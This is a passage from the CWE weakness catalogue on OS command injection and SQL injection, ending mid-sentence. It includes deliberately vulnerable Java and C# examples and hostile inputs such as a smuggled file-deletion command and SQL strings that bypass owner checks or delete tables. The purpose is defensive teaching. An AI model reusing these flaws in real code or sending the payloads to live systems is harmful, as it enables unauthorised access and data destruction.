In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.

(Bad Code)
Example Language: Java 
public String coordinateTransformLatLonToUTM(String coordinates)
{
String utmCoords = null;
try {
String latlonCoords = coordinates;
Runtime rt = Runtime.getRuntime();
Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords);
// process results of coordinate transform
// ...
}
catch(Exception e) {...}
return utmCoords;
}

However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program.

Example 5

The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.

(Bad Code)
Example Language: Java 
...
String btype = request.getParameter("backuptype");
String cmd = new String("cmd.exe /K \"
c:\\util\\rmanDB.bat "
+btype+
"&&c:\\utl\\cleanup.bat\"")
System.Runtime.getRuntime().exec(cmd);
...

The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well.

+ Observed Examples
ReferenceDescription
Canonical example. CGI program does not neutralize "|" metacharacter when invoking a phonebook program.
Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.
Web server allows command execution using "|" (pipe) character.
FTP client does not filter "|" from filenames returned by the server, allowing for OS command injection.
Shell metacharacters in a filename in a ZIP archive
Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.
OS command injection through environment variable.
OS command injection through https:// URLs
Chain: incomplete blacklist for OS command injection
Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters.
+ Potential Mitigations

Phase: Architecture and Design

If at all possible, use library calls rather than external processes to recreate the desired functionality.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phase: Architecture and Design

Strategy: Identify and Reduce Attack Surface

For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using the ESAPI Encoding control [R.78.8] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.

Phase: Implementation

Strategy: Output Encoding

While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict whitelist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).

Phase: Implementation

If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.

Phase: Architecture and Design

Strategy: Parameterization

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When constructing OS command strings, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phase: Operation

Strategies: Compilation or Build Hardening; Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used.

Phase: Operation

Strategy: Sandbox or Jail

Use runtime policy enforcement to create a whitelist of allowable commands, then prevent use of any command that does not appear in the whitelist. Technologies such as AppArmor are available to do this.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.78.9]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class77Improper Neutralization of Special Elements used in a Command ('Command Injection')
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory634Weaknesses that Affect System Processes
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory714OWASP Top Ten 2007 Category A3 - Malicious File Execution
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory727OWASP Top Ten 2004 Category A6 - Injection Flaws
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory741CERT C Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory744CERT C Secure Coding Section 10 - Environment (ENV)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory810OWASP Top Ten 2010 Category A1 - Injection
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory845CERT Java Secure Coding Section 00 - Input Validation and Data Sanitization (IDS)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8642011 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory875CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory878CERT C++ Secure Coding Section 10 - Environment (ENV)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory929OWASP Top Ten 2013 Category A1 - Injection
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
CanAlsoBeWeakness BaseWeakness Base88Argument Injection or Modification
Research Concepts1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base184Incomplete Blacklist
Research Concepts1000
+ Research Gaps

More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.

+ Affected Resources
  • System Process
+ Functional Areas
  • Program invocation
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVEROS Command Injection
OWASP Top Ten 2007A3CWE More SpecificMalicious File Execution
OWASP Top Ten 2004A6CWE More SpecificInjection Flaws
CERT C Secure CodingENV03-CSanitize the environment when invoking external programs
CERT C Secure CodingENV04-CDo not call system() if you do not need a command processor
CERT C Secure CodingSTR02-CSanitize data passed to complex subsystems
WASC31OS Commanding
CERT Java Secure CodingIDS07-JDo not pass untrusted, unsanitized data to the Runtime.exec() method
CERT C++ Secure CodingSTR02-CPPSanitize data passed to complex subsystems
CERT C++ Secure CodingENV03-CPPSanitize the environment when invoking external programs
CERT C++ Secure CodingENV04-CPPDo not call system() if you do not need a command processor
Software Fault PatternsSFP24Tainted input to command
+ White Box Definitions

A weakness where the code path has:

1. start statement that accepts input

2. end statement that executes an operating system command where

a. the input is used as a part of the operating system command and

b. the operating system command is undesirable

Where "undesirable" is defined through the following scenarios:

1. not validated

2. incorrectly validated

+ References
[R.78.1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.
[R.78.2] Pascal Meunier. "Meta-Character Vulnerabilities". 2008-02-20. <http://www.cs.purdue.edu/homes/cs390s/slides/week09.pdf>.
[R.78.3] Robert Auger. "OS Commanding". 2009-06. <http://projects.webappsec.org/OS-Commanding>.
[R.78.4] Lincoln Stein and John Stewart. "The World Wide Web Security FAQ". chapter: "CGI Scripts". 2002-02-04. <http://www.w3.org/Security/Faq/wwwsf4.html>.
[R.78.5] Jordan Dimov, Cigital. "Security Issues in Perl Scripts". <http://www.cgisecurity.com/lib/sips.html>.
[R.78.6] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 10: Command Injection." Page 171. McGraw-Hill. 2010.
[R.78.7] Frank Kim. "Top 25 Series - Rank 9 - OS Command Injection". SANS Software Security Institute. 2010-02-24. <http://blogs.sans.org/appsecstreetfighter/2010/02/24/top-25-series-rank-9-os-command-injection/>.
[R.78.8] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.78.9] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.78.10] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "Shell Metacharacters", Page 425.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2008-11-24CWE Content TeamMITREInternal
updated Observed_Examples, Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Name, Related_Attack_Patterns
2009-07-17KDM AnalyticsExternal
Improved the White_Box_Definition
2009-07-27CWE Content TeamMITREInternal
updated Description, Name, White_Box_Definitions
2009-10-29CWE Content TeamMITREInternal
updated Observed_Examples, References
2009-12-28CWE Content TeamMITREInternal
updated Detection_Factors
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2010-04-05CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Description, Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Observed_Examples, Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes
2014-06-23CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11OS Command Injection
2009-01-12Failure to Sanitize Data into an OS Command (aka 'OS Command Injection')
2009-05-27Failure to Preserve OS Command Structure (aka 'OS Command Injection')
2009-07-27Failure to Preserve OS Command Structure ('OS Command Injection')
2010-06-21Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Weakness ID: 89
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.

Extended Description

Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.

SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

Technology Classes

Database-Server

+ Modes of Introduction

This weakness typically appears in data-rich applications that save user inputs in a database.

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities.

Access Control

Technical Impact: Bypass protection mechanism

If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.

Access Control

Technical Impact: Bypass protection mechanism

If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability.

Integrity

Technical Impact: Modify application data

Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack.

+ Likelihood of Exploit

Very High

+ Enabling Factors for Exploitation

The application dynamically generates queries that contain user input.

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes.

Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis.

This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Database Scanners

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code. [1]

Example 2

The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.

(Bad Code)
Example Language: C# 
...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...

The query that this code intends to execute follows:

SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;

However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:

(Attack)
 
name' OR 'a'='a

for itemName, then the query becomes the following:

(Attack)
 
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a';

The addition of the:

(Attack)
 
OR 'a'='a

condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:

(Attack)
 
SELECT * FROM items;

This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.

Example 3

This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.

If an attacker with the user name wiley enters the string:

(Attack)
 
name'; DELETE FROM items; --

for itemName, then the query becomes the following two queries:

(Attack)
Example Language: SQL 
SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';
DELETE FROM items;
--'

Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.

Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.

If an attacker enters the string

(Attack)
 
name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a

Then the following three valid statements will